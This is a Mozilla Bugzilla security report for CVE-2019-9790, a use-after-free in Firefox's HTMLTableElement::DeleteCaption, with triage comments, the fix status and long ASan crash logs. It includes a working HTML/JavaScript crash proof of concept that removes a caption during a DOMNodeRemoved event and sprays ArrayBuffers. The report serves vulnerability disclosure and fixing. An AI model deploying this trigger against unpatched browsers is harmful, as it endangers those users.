Closed Bug 1525145 (CVE-2019-9790) Opened 6 years ago Closed 6 years ago

Use After Free In HTMLTableElment::DeleteCaption

Categories

(Core :: DOM: Core & HTML, defect, P1)

Product:
Core
Component:
DOM: Core & HTML
Type:
defect

Tracking

()

Status:
VERIFIED FIXED
Milestone:
mozilla67
Tracking Flags:
Tracking Status
firefox-esr60 66+ verified
firefox65 --- wontfix
firefox66 + verified
firefox67 + verified

People

(Reporter: wieser.brandon, Assigned: smaug)

Details

(Keywords: csectype-uaf, reporter-external, sec-critical, Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main66+][adv-esr60.6+])

Attachments

(3 files)

crash.html
928 bytes, text/html
Details
simplified test case from comment 7
668 bytes, text/html
Details
table_crashes.diff
2.81 KB, patch
peterv
: review+
jcristau
: approval-mozilla-beta+
RyanVM
: approval-mozilla-esr60+
abillings
: sec-approval+
Details | Diff | Splinter Review
Attached file crash.html

I found a use after free by code review and have wrote a crashing proof of concept. Also there are at least two other use after frees in the same class. The problem is a raw pointer to a caption element is obtained. Its then passed to RemoveChild() which dispatches a sync DOMNodeRemoved event. I've attached a simple proof of concept. Wait for the page to load and then mouse over the table. Click the alert box and firefox should crash. This like pretty old code so I bet most versions of firefox are effected. Also there are at least two other use after frees in that file. I'll open up separate bug reports for those. It could be modified to where you don't have to mouse over the table to and click the alert box to trigger to the bug but I've worked so long and hard to try and find a bug and I finally found one so I'm reporting it ASAP!. In order to fix this issue I would recommend taking a strong reference to the caption object so it cant be removed.

HTMLTableElement::DeleteCaption()
{
HTMLTableCaptionElement* caption = GetCaption();
if (caption) {
mozilla::ErrorResult rv;
nsINode::RemoveChild(*caption, rv);
MOZ_ASSERT(!rv.Failed());
}
}

Flags: sec-bounty?

I can't reproduce a crash with the testcase (tested on 66 beta, mac).

What version of Firefox are you testing on? Can you link to a submitted crash report for the crash?

Group: firefox-core-security → dom-core-security
Component: Security → DOM: Core & HTML
Flags: needinfo?(wieser.brandon)
Product: Firefox → Core

(In reply to :Gijs (he/him) from comment #1)

I can't reproduce a crash with the testcase (tested on 66 beta, mac).

What version of Firefox are you testing on? Can you link to a submitted crash report for the crash?

I was using an optimized plus debug build on linux. I think firefox 63? The code looks the same for firefox 66 hopefully I didnt jump the gun and report something that isn't issue again... I'll download the latest firefox and see if I cant get it to crash.

Flags: needinfo?(wieser.brandon)

Yup just confirmed it crashes the latest nightly asan build on linux. Make sure your running an http server. So for example python -m SimpleHTTPServer 8080 Then download latest asan build on linux and browser to http://127.0.0.1:8080/crash.html wait a few seconds for the asan browser to load the page then mouse over the table. Wait for the alert box to pop up and then click ok

Actually now that i figured out how to read addresssanitizers output I don't think this is use after free. Looks like a safe assertion failure. Sorry everyone looks like i jumped the gun again...

(In reply to Brandon Wieser from comment #4)

Actually now that i figured out how to read addresssanitizers output

Can you paste the output as a comment? Thank you!

Flags: needinfo?(wieser.brandon)

Based on code inspection this looks like a valid issue and a regression from bug 824907.

Assignee: nobody → bugs

simplified crashing PoC:

<html>
<head>
<script>
function boom()
{
var table = document.createElement("TABLE");
var caption = document.createElement("CAPTION");
table.appendChild(caption);

		table.addEventListener("DOMNodeRemoved", function()
		{
			table.removeEventListener("DOMNodeRemoved", arguments.callee, false);
			table.removeChild(caption);
			caption = null;
			for(var x = 0; x < 0x10; x++)
			{
				var g = new ArrayBuffer(0x1000000);
			}
			document.location.href='https://google.com';
			alert();
		}, false);
		table.deleteCaption();

	}
</script>

</head>
<body onload="boom();">
<h1 style="color:green;">welcome</h1>
</body>
</html>

ASAN Log:
Assertion failure: !rv.Failed(), at /builds/worker/workspace/build/src/dom/html/HTMLTableElement.cpp:651
#01: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8a60b51]
#02: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8ba5778]
#03: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26a3d6]
#04: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe269978]
#05: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#06: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26015e]
#07: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe24942a]
#08: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe2699ac]
#09: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#10: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b64f]
#11: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xed7bccb]
#12: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x865c1e4]
#13: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9285935]
#14: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9284107]
#15: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925d667]
#16: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925e9f7]
#17: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924f09b]
#18: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924e243]
#19: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x92512ae]
#20: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xb0aab6f]
#21: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd807450]
#22: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd804bfc]
#23: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd808f30]
#24: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608117d]
#25: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x60806ba]
#26: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607de89]
#27: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607f7a3]
#28: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608020d]
#29: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x47d9b8e]
#30: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x7018d6b]
#31: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffdd57]
#32: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffd1f2]
#33: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x70a91d6]
#34: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x457411a]
#35: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b2496]
#36: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b8f6d]
#37: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5369ef6]
#38: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#39: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#40: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xabd567b]
#41: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe052605]
#42: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x536abca]
#43: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#44: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#45: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe051c69]
#46: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ec08]
#47: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ee8f]
#48: __libc_start_main[/lib/x86_64-linux-gnu/libc.so.6 +0x2409b]
#49: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x34a05]
==32570==WARNING: ASan is ignoring requested __asan_handle_no_return: stack top: 0x7ffe292e8000; bottom 0x7fb2e12e2000; size: 0x004b48006000 (323330531328)
False positive error reports may follow
For details see https://github.com/google/sanitizers/issues/189

Program /home/sequel/Desktop/firefoxaddressan/firefox (pid = 32570) received signal 11.
Stack:
#01: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xf9dc4fb]
#02: ???[/lib/x86_64-linux-gnu/libpthread.so.0 +0x12dd0]
#03: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x951c6fe]
#04: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8a60b51]
#05: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8ba5778]
#06: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26a3d6]
#07: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe269978]
#08: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#09: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26015e]
#10: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe24942a]
#11: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe2699ac]
#12: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#13: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b64f]
#14: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xed7bccb]
#15: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x865c1e4]
#16: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9285935]
#17: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9284107]
#18: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925d667]
#19: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925e9f7]
#20: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924f09b]
#21: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924e243]
#22: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x92512ae]
#23: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xb0aab6f]
#24: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd807450]
#25: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd804bfc]
#26: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd808f30]
#27: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608117d]
#28: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x60806ba]
#29: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607de89]
#30: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607f7a3]
#31: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608020d]
#32: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x47d9b8e]
#33: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x7018d6b]
#34: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffdd57]
#35: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffd1f2]
#36: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x70a91d6]
#37: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x457411a]
#38: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b2496]
#39: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b8f6d]
#40: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5369ef6]
#41: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#42: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#43: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xabd567b]
#44: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe052605]
#45: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x536abca]
#46: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#47: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#48: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe051c69]
#49: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ec08]
#50: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ee8f]
#51: __libc_start_main[/lib/x86_64-linux-gnu/libc.so.6 +0x2409b]
#52: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x34a05]
Sleeping for 300 seconds.
Type 'gdb /home/sequel/Desktop/firefoxaddressan/firefox 32570' to attach your debugger to this thread.

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0070,name=PBrowser::Msg_SynthMouseMoveEvent) Channel error: cannot send/recv

[Parent 32513, Main Thread] WARNING: SendSynthMouseMoveEvent() failed: 'ret', file /builds/worker/workspace/build/src/dom/ipc/TabParent.cpp, line 1084

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0070,name=PBrowser::Msg_SynthMouseMoveEvent) Channel error: cannot send/recv

[Parent 32513, Main Thread] WARNING: SendSynthMouseMoveEvent() failed: 'ret', file /builds/worker/workspace/build/src/dom/ipc/TabParent.cpp, line 1084

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0087,name=PBrowser::Msg_Destroy) Channel error: cannot send/recv

++DOCSHELL 0x619000faf580 == 10 [pid = 32513] [id = {4533dd08-8a0e-4512-ae93-48e7169f89c7}]
++DOMWINDOW == 20 (0x61600032d980) [pid = 32513] [serial = 25] [outer = (nil)]
++DOMWINDOW == 21 (0x619000322380) [pid = 32513] [serial = 26] [outer = 0x61600032d980]
++DOMWINDOW == 22 (0x6190009ffb80) [pid = 32513] [serial = 27] [outer = 0x61600032d980]
++DOMWINDOW == 23 (0x619001142280) [pid = 32513] [serial = 28] [outer = 0x616000328580]
++DOCSHELL 0x61900035ca80 == 11 [pid = 32513] [id = {289c3ea8-5dab-4f92-b0f6-557250b4dd23}]
++DOMWINDOW == 24 (0x616000035180) [pid = 32513] [serial = 29] [outer = (nil)]
++DOMWINDOW == 25 (0x619000137980) [pid = 32513] [serial = 30] [outer = 0x616000035180]
++DOMWINDOW == 26 (0x6190001f5e80) [pid = 32513] [serial = 31] [outer = 0x616000035180]
++DOCSHELL 0x619000ffa080 == 12 [pid = 32513] [id = {7f9a80a5-cfe2-4cbf-97bc-e1ea9bdccafa}]
++DOMWINDOW == 27 (0x616000267380) [pid = 32513] [serial = 32] [outer = (nil)]
++DOMWINDOW == 28 (0x619001205c80) [pid = 32513] [serial = 33] [outer = 0x616000267380]
[Parent 32513, StreamTrans #53] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 304
[Parent 32513, StreamTrans #53] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 308
[Parent 32513, StreamTrans #53] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 310
--DOCSHELL 0x6190001b7b80 == 11 [pid = 32513] [id = {0fdd9f0c-212c-4a38-8c7e-a06d560b0db1}]
--DOCSHELL 0x619000fda780 == 10 [pid = 32513] [id = {9001855b-00c7-45f3-8952-2fa884d98d89}]
--DOMWINDOW == 27 (0x6160002e0b80) [pid = 32513] [serial = 21] [outer = (nil)] [url = chrome://devtools/content/inspector/markup/markup.xhtml]
--DOMWINDOW == 26 (0x61600021ba80) [pid = 32513] [serial = 17] [outer = (nil)] [url = about:blank]
--DOMWINDOW == 25 (0x619000dd3180) [pid = 32513] [serial = 18] [outer = (nil)] [url = about:blank]
--DOMWINDOW == 24 (0x6190003a6180) [pid = 32513] [serial = 22] [outer = (nil)] [url = chrome://devtools/content/inspector/markup/markup.xhtml]
++DOCSHELL 0x6190006ddd80 == 1 [pid = 32614] [id = {34f3fe68-af12-442a-95a5-22781e35ee02}]
++DOMWINDOW == 1 (0x61600009a280) [pid = 32614] [serial = 1] [outer = (nil)]
++DOMWINDOW == 2 (0x619000737d80) [pid = 32614] [serial = 2] [outer = 0x61600009a280]
[Parent 32513, Main Thread] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/netwerk/url-classifier/UrlClassifierCommon.cpp, line 122
++DOMWINDOW == 25 (0x6190007bc580) [pid = 32513] [serial = 34] [outer = 0x616000035180]
++DOMWINDOW == 3 (0x61900074ef80) [pid = 32614] [serial = 3] [outer = 0x61600009a280]
[Child 32614, Main Thread] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 280
[Child 32614, StreamTrans #3] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 304
[Child 32614, StreamTrans #3] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 308
[Child 32614, StreamTrans #3] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 310
Assertion failure: !rv.Failed(), at /builds/worker/workspace/build/src/dom/html/HTMLTableElement.cpp:651
#01: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8a60b51]
#02: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8ba5778]
#03: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26a3d6]
#04: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe269978]
#05: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#06: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26015e]
#07: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe24942a]
#08: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe2699ac]
#09: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#10: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b64f]
#11: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xed7bccb]
#12: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x865c1e4]
#13: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9285935]
#14: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9284107]
#15: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925d667]
#16: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925e9f7]
#17: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924f09b]
#18: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924e243]
#19: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x92512ae]
#20: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xb0aab6f]
#21: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd807450]
#22: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd804bfc]
#23: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd808f30]
#24: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608117d]
#25: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x60806ba]
#26: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607de89]
#27: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607f7a3]
#28: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608020d]
#29: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x47d9b8e]
#30: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x7018d6b]
#31: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffdd57]
#32: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffd1f2]
#33: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x70a91d6]
#34: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x457411a]
#35: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b2496]
#36: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b8f6d]
#37: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5369ef6]
#38: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#39: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#40: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xabd567b]
#41: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe052605]
#42: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x536abca]
#43: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#44: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#45: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe051c69]
#46: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ec08]
#47: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ee8f]
#48: __libc_start_main[/lib/x86_64-linux-gnu/libc.so.6 +0x2409b]
#49: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x34a05]
==32614==WARNING: ASan is ignoring requested __asan_handle_no_return: stack top: 0x7ffc10aa2000; bottom 0x7f99a8156000; size: 0x00626894c000 (422661373952)
False positive error reports may follow
For details see https://github.com/google/sanitizers/issues/189

Program /home/sequel/Desktop/firefoxaddressan/firefox (pid = 32614) received signal 11.
Stack:
#01: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xf9dc4fb]
#02: ???[/lib/x86_64-linux-gnu/libpthread.so.0 +0x12dd0]
#03: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x951c6fe]
#04: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8a60b51]
#05: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x8ba5778]
#06: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26a3d6]
#07: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe269978]
#08: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#09: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26015e]
#10: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe24942a]
#11: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe2699ac]
#12: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b429]
#13: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe26b64f]
#14: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xed7bccb]
#15: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x865c1e4]
#16: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9285935]
#17: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x9284107]
#18: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925d667]
#19: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x925e9f7]
#20: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924f09b]
#21: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x924e243]
#22: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x92512ae]
#23: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xb0aab6f]
#24: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd807450]
#25: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd804bfc]
#26: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xd808f30]
#27: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608117d]
#28: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x60806ba]
#29: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607de89]
#30: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x607f7a3]
#31: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x608020d]
#32: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x47d9b8e]
#33: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x7018d6b]
#34: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffdd57]
#35: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x6ffd1f2]
#36: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x70a91d6]
#37: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x457411a]
#38: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b2496]
#39: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x45b8f6d]
#40: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5369ef6]
#41: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#42: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#43: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xabd567b]
#44: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe052605]
#45: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x536abca]
#46: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x52991ad]
#47: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0x5299021]
#48: ???[/home/sequel/Desktop/firefoxaddressan/libxul.so +0xe051c69]
#49: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ec08]
#50: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x10ee8f]
#51: __libc_start_main[/lib/x86_64-linux-gnu/libc.so.6 +0x2409b]
#52: ???[/home/sequel/Desktop/firefoxaddressan/firefox +0x34a05]
Sleeping for 300 seconds.
Type 'gdb /home/sequel/Desktop/firefoxaddressan/firefox 32614' to attach your debugger to this thread.

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0072,name=PBrowser::Msg_RealMouseButtonEvent) Channel error: cannot send/recv

[Parent 32513, Main Thread] WARNING: SendRealMouseButtonEvent() failed: 'ret', file /builds/worker/workspace/build/src/dom/ipc/TabParent.cpp, line 1101

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0070,name=PBrowser::Msg_SynthMouseMoveEvent) Channel error: cannot send/recv

[Parent 32513, Main Thread] WARNING: SendSynthMouseMoveEvent() failed: 'ret', file /builds/worker/workspace/build/src/dom/ipc/TabParent.cpp, line 1084
++DOCSHELL 0x6190001b7b80 == 11 [pid = 32513] [id = {2feeaa8a-988f-4cc7-ad1b-f7e24e4841a6}]
++DOMWINDOW == 26 (0x616000171f80) [pid = 32513] [serial = 35] [outer = (nil)]
++DOMWINDOW == 27 (0x61900031e280) [pid = 32513] [serial = 36] [outer = 0x616000171f80]

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0068,name=PBrowser::Msg_UpdateDimensions) Channel error: cannot send/recv

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0070,name=PBrowser::Msg_SynthMouseMoveEvent) Channel error: cannot send/recv

[Parent 32513, Main Thread] WARNING: SendSynthMouseMoveEvent() failed: 'ret', file /builds/worker/workspace/build/src/dom/ipc/TabParent.cpp, line 1084

###!!! [Parent][RunMessage] Error: Channel error: cannot send/recv

###!!! [Parent][MessageChannel] Error: (msgtype=0x35001F,name=PContent::Msg_NotifyVisited) Channel error: cannot send/recv

###!!! [Parent][MessageChannel] Error: (msgtype=0x520016,name=PHttpChannel::Msg_Redirect3Complete) Channel error: cannot send/recv

###!!! [Parent][MessageChannel] Error: (msgtype=0x52001A,name=PHttpChannel::Msg_DeleteSelf) Channel error: cannot send/recv

###!!! [Parent][RunMessage] Error: Channel error: cannot send/recv

###!!! [Parent][RunMessage] Error: Channel error: cannot send/recv

###!!! [Parent][MessageChannel] Error: (msgtype=0x1E0087,name=PBrowser::Msg_Destroy) Channel error: cannot send/recv

++DOCSHELL 0x619000ecf480 == 12 [pid = 32513] [id = {dc30e74f-6ba0-477d-8fd2-9b57a8192dd5}]
++DOMWINDOW == 28 (0x6160003ca280) [pid = 32513] [serial = 37] [outer = (nil)]
++DOMWINDOW == 29 (0x61900084a880) [pid = 32513] [serial = 38] [outer = 0x6160003ca280]
++DOMWINDOW == 30 (0x619000cd8280) [pid = 32513] [serial = 39] [outer = 0x6160003ca280]
++DOMWINDOW == 31 (0x6190005cf380) [pid = 32513] [serial = 40] [outer = 0x616000171f80]
console.error: "Exception while opening the toolbox" "Protocol error (noSuchActor): No such actor for ID: server1.conn2.child1/frameTarget1" "Protocol error (noSuchActor): No such actor for ID: server1.conn2.child1/frameTarget1"
undefined
[Parent 32513, StreamTrans #55] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 304
[Parent 32513, StreamTrans #55] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 308
[Parent 32513, StreamTrans #55] WARNING: 'NS_FAILED(rv)', file /builds/worker/workspace/build/src/xpcom/base/MemoryTelemetry.cpp, line 310
Couldn't convert chrome URL: chrome://branding/locale/brand.properties
--DOMWINDOW == 30 (0x619000322380) [pid = 32513] [serial = 26] [outer = (nil)] [url = about:blank]
--DOCSHELL 0x61900035ca80 == 11 [pid = 32513] [id = {289c3ea8-5dab-4f92-b0f6-557250b4dd23}]
--DOCSHELL 0x619000ffa080 == 10 [pid = 32513] [id = {7f9a80a5-cfe2-4cbf-97bc-e1ea9bdccafa}]
--DOMWINDOW == 29 (0x61600032d980) [pid = 32513] [serial = 25] [outer = (nil)] [url = about:tabcrashed?e=tabcrashed&u=http%3A//127.0.0.1%3A8080/crash.html&c=UTF-8&f=regular&d=%20]
--DOCSHELL 0x619000faf580 == 9 [pid = 32513] [id = {4533dd08-8a0e-4512-ae93-48e7169f89c7}]
